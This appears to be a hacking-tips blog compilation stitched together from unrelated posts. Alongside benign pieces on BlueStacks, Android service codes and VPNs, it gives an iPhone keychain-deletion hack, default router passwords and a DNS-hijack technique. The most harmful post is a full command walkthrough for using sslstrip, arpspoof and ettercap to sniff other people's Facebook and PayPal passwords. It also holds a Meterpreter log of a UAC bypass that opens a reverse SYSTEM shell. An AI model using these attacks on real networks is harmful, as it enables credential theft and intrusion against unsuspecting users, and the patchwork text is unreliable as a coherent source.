Run Any Android Application On Windows | BlueStack

BlueStacks is an Android app player for Windows that can run any type of Android apps and games in full screen mode without encountering any performance or compatibility related issues. It features 10 pre-loaded apps along with an option to add custom apps. You can either download new apps from the BlueStacks Channel or push your favorite apps from your Android phone to your PC via BlueStacks

Remove Lost iPhone Backup Password

Lets say that at some point you decided to adhere to security best practices and set a password on your iPhone backups so that they are encrypted. A year or two later you have upgraded your iPhone to a new version and you want to transfer all of your data across to the new phone. You attempt to restore from your backup and, doh, you need to remember the password you set. You try every password you could have set but none of them work. You try to remove the "Encrypt iPhone Backup" option so that you can create a backup without a password, but again it asks you for the password to disable the password.

Here is a hack that will let you disable your encrypted backups without the password so that you can create an unencrypted version to use to transfer your data across to your new phone:

1. Jailbreak your device. The easiest way to do this is via www.jailbreakme.com, or if you have a more specific set of requirements then use Redsn0w or PwnageTool. This will install the hacked AppStore called Cydia.
2. Use Cydia to install OpenSSH and SQLite3
3. Connect your iPhone to a wireless network and ssh to it using Apple's default root password of "alpine"
4. We want to manipulate the keychains that basically store your saved encrypted passwords. Run "cd /var/Keychains" and you will find the keychains SQLite database called "keychain-2.db".
5. Connect to the keychain database by running the command "sqlite3 keychain-2.db"
6. Dump the contents of the table called "genp" by typing the following into the SQLite command prompt "select * from genp;"
7. Find the row containing the text "BackupPassword"
8. Get the RowID from the start of this line. Mine was "29"
9. Delete this row by typing the following into the SQLite command prompt "delete from genp where rowid = 29;" (remember to change 29 to be your own RowID)
10. Plug your iPhone into iTunes, where it will show that you still have a backup password enabled. Deselect the "Encrypt iPhone Backup" option.
11. This will ask you for your password, but don't fret! Type arbitrary text in as your password and hit ok.
At this point your password will be accepted, your backup encryption option will be disabled, nd your phone will start backing up unencrypted.

How to Block Proxy Servers?

(Important for web designer and relate web development)

Do you operate an e-commerce business? You check your access logs daily to see if there have been suspicious activities, such as hackers or botnets hacking your system.

Perhaps one of the challenges you face is proxy servers. You would like to block them so they don’t harm your system. Block proxy servers with the follow this methods

Basically there are

Method -1)

In this method you have to purchase software from the 3^rd party  vendor  

1. Install proxy software on your server. (Already available on google try it from google search )

2. Analyze the IP address

3. Verify if the address is a static IP address.

4. Search for the IP address in the CIDR.

5. Block the proxy server from visiting your website.

Method-2)

This method will work if  you have used apache server for configuration

Block proxy servers by HTTP protocols.

 If you don’t want to purchase software, there is another way. You can insert a script in your website’s root .htaccess file. It’s best to copy and paste the code, rather than type it. That way, you can be sure that you won’t make any errors. After you’ve inserted the code, upload it to your server. This method is effective. Insert the following code:

# block proxy servers from site access
# source:http://perishablepress.com/press/2008/04/20/how-to-block-proxy-servers-via-htaccess/

# for details on how .htaccess is working check out url:http://httpd.apache.org/docs/1.3/howto/htaccess.html

RewriteEngine on
RewriteCond %{HTTP:VIA}  !^$ [OR]
RewriteCond %{HTTP:FORWARDED}  !^$ [OR]
RewriteCond %{HTTP:USERAGENT_VIA}  !^$ [OR]
RewriteCond %{HTTP:X_FORWARDED_FOR}  !^$ [OR]
RewriteCond %{HTTP:PROXY_CONNECTION}  !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION}  !^$ [OR]
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]

RewriteCond %{HTTP:HTTP_CLIENT_IP}  !^$
RewriteRule ^(.*)$ - [F]

[Note: again only applicable for apache server ]

Enjoy web designing in secure way..

Secrets of android

1. Complete Info

*#*#4636#*#*

 This code can be used to get some interesting information about your phone and battery. It shows following 4 menus on screen:

• Phone information
• Battery information
• Battery history
• Usage statistics

2. Factory data reset

*#*#7780#*#*

This code can be used for a factory data reset. It’ll remove following things:

• Google account settings stored in your phone
• System and application data and settings
• Downloaded applications

It’ll NOT remove:

• Current system software and bundled application
• SD card files e.g. photos, music files, etc.

Note:

Once you give this code, you get a prompt screen asking you to click on “Reset phone” button. So you get a chance to cancel your operation.

3. Format Android Phone

  *2767*3855#

Think before you give this code. This code is used for factory format. It’ll remove all files and settings including the internal memory storage. It’ll also reinstall the phone firmware.

Note:

Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.

4. Phone Camera Update

*#*#34971539#*#*

This code is used to get information about phone camera. It shows following 4 menus:

• Update camera firmware in image (Don’t try this option)
• Update camera firmware in SD card
• Get camera firmware version
• Get firmware update count

WARNING:

Never use the first option otherwise your phone camera will stop working and you’ll need to take your phone to service center to reinstall camera firmware.

5. End Call/Power

*#*#7594#*#*

This one is my favorite one. This code can be used to change the “End Call / Power” button action in your phone. Be default, if you long press the button, it shows a screen asking you to select any option from Silent mode, AirPlane mode and Power off.

You can change this action using this code. You can enable direct power off on this button so you don’t need to waste your time in selecting the option.

6. File Copy for Creating Backup

*#*#273283*255*663282*#*#*

This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.

7.  Service Mode

*#*#197328640#*#*

This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

8. WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#*           – WLAN test (Use “Menu” button to start various tests) 

*#*#232338#*#*                  – Shows WiFi MAC address 

*#*#1472365#*#*                – GPS test 

*#*#1575#*#*                      – Another GPS test 

*#*#232331#*#*                  – Bluetooth test 

*#*#232337#*#                    – Shows Bluetooth device address

9. Codes to get Firmware version information:

*#*#4986*2650468#*#* – PDA, Phone, H/W, RFCallDate 

*#*#1234#*#* – PDA and Phone 

*#*#1111#*#* – FTA SW Version 

*#*#2222#*#* – FTA HW Version 

*#*#44336#*#* – PDA, Phone, CSC, Build Time, Changelist number

10. Codes to launch various Factory Tests:

*#*#0283#*#* – Packet Loopback 

*#*#0*#*#* – LCD test 

*#*#0673#*#* OR *#*#0289#*#* – Melody test 

*#*#0842#*#* – Device test (Vibration test and BackLight test) 

*#*#2663#*#* – Touch screen version 

*#*#2664#*#* – Touch screen test 

*#*#0588#*#* – Proximity sensor test 

*#*#3264#*#* – RAM version

I think u will like this …

How to reset the password of router

What is 192.168.1.1 IP Address ?

For the convenience of the first time users to configure their home networking devices like broadband routers and to provide a standard computing environment, most of the network hardware manufacturers like LinkSys, Netgear, Westell etc. use a default IP address 192.168.1.1 for accessing their devices.

All you need to do is to type 192.168.1.1 in the address bar of your browser and just press enter. You will be able to configure all the settings of the Broadband router, with ease in your browser window.

IP 192.168.1.1 is a private IPv4 address and any computer, modem, router or any other internet devices can be configured using this IP 192.168.1.1 address. The limitation of this scheme is that this IP cannot be used on Internet and thus these devices cannot be configured through Internet. But the advantage of using a standard IP address is far more than the disadvantage.

How to Reset / Crack 192.168.1.1 Password

In case you have forgotten or lost your 192.168.1.1 router password, then you can try different combination of username passwords. In case, you are like most of other users, who do not bother to change the default login settings of the devices, then your choices can be …

1. username: <admin< / password: <admin>
2. username: <>/<admin>
3. username: <admin>/<password>

In most cases, you will be able to retrieve the access. In case you are not able to do that, and you are not able to remember the lost password of 192.168.1.1, then the only option left is to use the hardware reset button on the router. Just remember to press the reset button for at least 30 seconds, otherwise the router may not be able to reset itself to the factory settings.

Once the router settings are reset, just use try to use the different username password combination we have described above.

The Default Password List of Most Routers

In case you have changed the default username and password of the http://192.168.1.1 Router, then there is no solution other than trying a hardware reset. But in case, you have not changed the password, then you can try to access the router by using a combination of password given below.

What is conficker worm?

The Conficker worm is a computer worm that can infect your computer and spread itself to other computers across a network automatically, without human interaction.

What does the Conficker worm do?

It might spread through file sharing and via removable drives, such as USB drives (also known as thumb drives). The worm adds a file to the removable drive so that when the drive is used, the AutoPlay dialog box will show one additional option.
The Conficker worm can also disable important services on your computer.
In the screenshot of the Autoplay dialog box below, the option Open folder to view files — Publisher not specified was added by the worm. The highlighted option — Open folder to view files — using Windows Explorer is the option that Windows provides and the option you should use.
If you select the first option, the worm executes and can begin to spread itself to other computers.

How does it work?

How to prevent that worm

If your computer is infected with the Conficker worm, you may be unable to download certain virus protection security products, such as the Microsoft Malicious Software Removal Tool or you may be unable to access certain websites, such as Microsoft Update. If you can't access those tools, try using the Microsoft Safety Scanner for virus removal.

Source:

http://www.microsoft.com/security/pc-security/conficker.aspx#ETB

Top Ten Cyber Crime Skills in High Demand

With trillions of dollars in electronic funds available for the taking, cyber crime has become big business.
Like any other rapidly expanding business sector, particular expertise and skills are increasingly in demand, presenting exceptional career opportunities for those with less than noble character dispositions.
At the recent FOSE conference - a government IT trade show - deputy assistant director in the FBI's cyber division Steven Chabinsky identified the top ten skill sets for the blossoming cyber crime industry.
"The cyber underground now consist of subject matter experts that can focus all their time and energy on improving their techniques, their goods and services," said Chabinsky.
Expertise in high demand include:
1. Coders/programmers, who write the exploits and malware used by the criminal enterprise. Contrary to popular belief, Chabinsky noted that coders who knowingly take part in a criminal enterprise are not protected by the First Amendment.

2. Distributors, who trade and sell stolen data and act as vouchers for the goods provided by other specialists.

3. Tech experts, who maintain the criminal enterprise's IT infrastructure, including servers, encryption technologies, databases, and the like.

4. Hackers, who search for and exploit applications, systems and network vulnerabilities. 
5. Fraudsters, who create and deploy various social engineering schemes, such as phishing and spam.
6. Hosted systems providers, who offer safe hosting of illicit content servers and sites.
7. Cashiers, who control drop accounts and provide names and accounts to other criminals for a fee.
8. Money mules, who complete wire transfers between bank accounts. The money mules may use student and work visas to travel to the U.S. to open bank accounts.
9. Tellers, who are charged with transferring and laundering illicitly gained proceeds through digital currency services and different world currencies.

Hack secured pdf files
Hi guys,

Some times i have faced the problem of copying data from secured pdf files or can't print them. I found that if you don't have the owner or user password you can not copy or print that, Now i have one solution for that.

• Download any LiveCD of Ubuntu of any version HERE.
• Just Boot with CD and browse the file.
• Now Goto File menu and print->Now Select Print to File.
• Just give a name for that and print.
• Now you can do anything with your new pdf file.

Enjoy guys !!!!

Throwthe surveys out of your way

Were u stuck somewhere, someday just becoz of a survey? 

Now u can remove the surveys from any* site without taking any pain or wasting ur time. 

If u come across sites which contain surveys more frequently just save this from below given below link code as a bookmark and whenever you see the survey just click on the bookmark u saved and the survey is gone....... 

for resolveing this problem just go and check this link..

http://survey-remover.com/

Virus History Graphically

Google Analytics hack | Dns smuggling
i'll discuss the technique that is used for this and somehow you have to do this stuff on your own
Alright, to pull this off, The only tough thing you have to pull off is getting control of the target’s DNS somehow. More specifically, we need to at least control the resolution to a single specific DNS record. There’s dozens of ways to do this, including, but not limited to..:

• Actually being a man-in-the-midde, and using dnsspoof, ettercap, what have you.
• Compromising the victim’s DNS server. Less likely if they’re using a major provider, but maybe you’re pen-testing an organization that runs one internally.
• Add a record to the victim’s hosts file. This obviously requires some access already, but it would give you some additional permanence on a box, and help escalate you past what you have access to without their web passwords. It’s also not likely to be noticed if the victim doesn’t have some kind of file integrity tripwire set up.
• Changing the DNS server on a router. Easy to do on your average home wireless router run by the inept, and still possible if an organization hasn’t properly secured their routers.
• Run a fake DHCP server, and hand out your DNS server’s address to clients. This can go along well with PwnPlugs, for example.

So once we can do that, we just need to get their browser to believe that “www.google-analytics.com”, aka “www-google-analytics.l.google.com”, is at an IP address where we have a web server running on port 80.
Interestingly, Google makes this easy for us, in that we don’t have to worry about SSL, or certificate errors. We probably don’t have a way to make our web server’s SSL certificate match the one for Google’s, but that’s okay. In the javascript included on web pages that use it, Google Analytics actually checks to see if the site is being accessed via SSL, and if so, it calls the Analytics code from an entirely different host name, ssl.google-analytics.com, rather than www.
This means that if the victim accesses a site using Google Analytics over SSL from the start, we don’t get access, but the user also doesn’t get alerted. However, if the site initially loads unencrypted, we can hijack things and replace any links to https with regular http links from then on out.

Sniff SSL | https password sniffing 

Tool requirement:
sslstrip, ettercap, arpspoof already in backtrack .

Procedure
Ok well I'v seen a couple people complaining about not being able to sniff facebook, hotmail and paypal passwords. This is because these sites use an https connection. So before you can sniff these passwords in a mitm attack you need to strip the ssl. Ettercap does have an ssl stripping ability but we're going to use sslstrip because it's better.

First thing you need to get it backtrack 4 pre-final. Or you can use another linux distro, and add the tools yourself.
1. First we need to find out what your subnet and default gateway is. Open up a shell.
 Code:
route

you will get something like this
Code:
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.1.0 * 255.255.255.0 U 0 0 0 wlan0
default 192.168.1.254 0.0.0.0 UG 0 0 0 wlan0


in my case 192.168.1.254 is the gateway. Therefore 192.168.1.1 is the subnet and we use that with nmap.


2. So now we use nmap to find other machines on the network.
Code:
nmap -sP 192.168.1.1/24 |grep "Host"


3. Now we need to enable ip tables in ettercap.
Code:
nano /etc/etter.conf


scroll down untill you find these lines in the file

Code:

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Change them to this
Code:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Hit Ctrl-X then y then enter

4. Now we create our iptables rule
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

5. Now we need to enable ip forwarding
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
 
6. Now we need to find the interface your using.
Code:
ifconfig

find the interface with your ip address listed underneath it. In my case it's wlan0.

7. Now start sslstrip
Code:
sslstrip -a -k -f

OPTION A: (better)
1. Open a new shell and start arpspoof
Code:
arpspoof -i wlan0 -t 192.168.1.101 192.168.1.254

wlan0 is my interface
192.168.1.101 is my target ip
192.168.1.254 is my gateway

2. Finally, open up another shell and start ettercap in sniffer mode.
Code:
ettercap -T -q -i wlan0
wlan0 being your interface
The sniffed passwords will come up in the ettercap window.
Last thing. Arpspoof will not re-arp the victims for you. So just start arp-spoofing with ettercap and shut it down right away.

Code:
ettercap -T -M arp:remote -i wlan0 /192.168.1.254/ /192.168.1.101/

interface: wlan0
gateway: 192.168.1.254
target: 192.168.1.101

then just hit "q" and ettercap will re-arp your victim. I usually already have this command typed and ready to go in a new shell so I can quickly fix the arp cache when I'm done.

OPTION B: (easier)
open up a new shell and start ettercap
Code:
ettercap -T -i wlan0 -q -M arp:remote /192.168.1.254/ /192.168.1.101/

interface: wlan0
gateway: 192.168.1.254
target: 192.168.1.101 (leave target blank "//" to poison entire network)

How to hack windows 7 kevin mitnick style
Here is a nice new addition to bypass UAC through meterpreter. It all came about when Kevin Mitnick was on a pentest and needed to bypass Windows 7 UAC. We stumbled upon an old post from Leo Davidson (http://www.pretentiousname.com/misc/win7_uac_whitelist2.html) on bypassing Windows UAC. This method takes advantage of process injection that has a trusted Windows Publisher Certificate (example explorer.exe which runs at medium integrity). This is fully functioning on both x86/64 bit platforms. Source code is in the zip along with the meterpreter plugin here.




[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:1544) at Fri Dec 31 20:43:24 -0500 2010
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > run bypassuac
[*] Creating a reverse meterpreter stager: LHOST=172.16.32.128 LPORT=4546
[*] Running payload handler
[*] Uploading Windows UACBypass to victim machine.
[*] Bypassing UAC Restrictions on the system….
[*] Meterpreter stager executable 73802 bytes long
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 172.16.32.128:4546 with UACBypass in effect…
meterpreter > [*] Meterpreter session 2 opened (172.16.32.128:4546 -> 172.16.32.130:1547) at Fri Dec 31 20:43:40 -0500 2010
meterpreter >
Background session 1? [y/N]
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2…
meterpreter > getsystem
…got system (via technique 1).
meterpreter > shell
Process 416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>

1. Summary:

When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered to subvert this security mechanisms. Note, you do NOT have to be friends with the user to send them a message with an attachment.

---------------------------------------------------------------------------------------------------------------------------

2. Description:

When attaching an executable file, Facebook will return an error message stating:

"Error Uploading: You cannot attach files of that type."

When uploading a file attachment to Facebook we captured the web browsers POST request being sent to the web server. Inside this POST request reads the line:

Content-Disposition: form-data; name="attachment"; filename="cmd.exe"

It was discovered the variable 'filename' was being parsed to determine if the file type is allowed or not.To subvert the security mechanisms to allow an .exe file type, we modified the POST request by appending a space to our filename variable like so: name="cmd.exe "

This was enough to trick the parser and allow our executable file to be attached and sent in a message.

-------------------------------------------------------------------------------------------------------------------------

3. Impact:

Potentially allow an attacker to compromise a victim’s computer system.

-----------------------------------------------------------------------------------------------------------------------

4. Affected Products:

www.facebook.com

-----------------------------------------------------------------------------------------------------------------------

5. Time Table:

09/30/2011 Reported Vulnerability to the Vendor

10/26/2011 Vendor Acknowledged Vulnerability

10/27/2011 Publicly Disclosed

-----------------------------------------------------------------------------------------------------------------------

6. Credits:

Discovered by Nathan Power

www.securitypentest.com

 

How Do Virtual Private Networks Work?

Virtual Private Networks (VPNs) are definitely rising these days and it’s not difficult to see why. As a business expands, a technology such as VPN can make a huge difference by making sure that things will run as efficiently as they can. For one, it enables the people involved in the business to work in secure and reliable method. It also lets them safely share information through and across computer networks whether in just one location or multiple ones. Those whose job also involves traveling and moving around can greatly benefit from a VPN. Now, if VPN is something new to you, then you bumped into the right article. Here we will talk about this technology and how it works.

A VPN is actually a private network that uses a public network to connect remote users or sites together. It utilizes virtual connections from the private network to the remote employee or site through the internet. By using it, the security of the information is ensured, as any interception of the encrypted data will be disabled. A thoroughly designed VPN should provide a business with the following:

- Extended and broader connections across various geographic locations without having to use a leased line.

- Flexibility for far-off offices and employees to utilize the business’ intranet over a current internet connection as if they were really or directly connected to the network.

- Improved productivity and efficiency for remote employees

- Enhanced security for exchanging files and other important data.

- Savings in time, expense, and effort for everyone.

Of course, depending on the needs of your company, you may or may not put equal premium on all the mentioned benefits above. However, you can particularly highlight whichever feature is highly needed.

Now, although a business may choose the benefits they want to enjoy from their own VPN, all Virtual Private Networks should be secure, reliable, and scalable. They should be able to protect your data while transporting on the public network. In the case that anyone tries to get your information, he or she should be unable to read, use, or take any of it.

Employees, even those who are in remote offices, should also be able to connect to their private network any time without any problem in connection or its quality. Moreover, the VPN should be able to extend its services as the need arises, without having to replace the technology altogether.

There’s no single standard in setting up VPNs. If you are putting up your own network, it’s all up to you on which components and protocols you would like to put together. Basically, though, when planning or extending an existing one, you should have a network access server, firewall, and triple “A” server. Triple “A” stands for authentication, authorization, and accounting.

 Virtual Private Networks are probably the best tools to use if you want a secured and reliable browsing and data-sharing experience for your business. They are also useful in unlocking restricted websites. If you want all these benefits and more, then now is the best time to learn more about VPNs.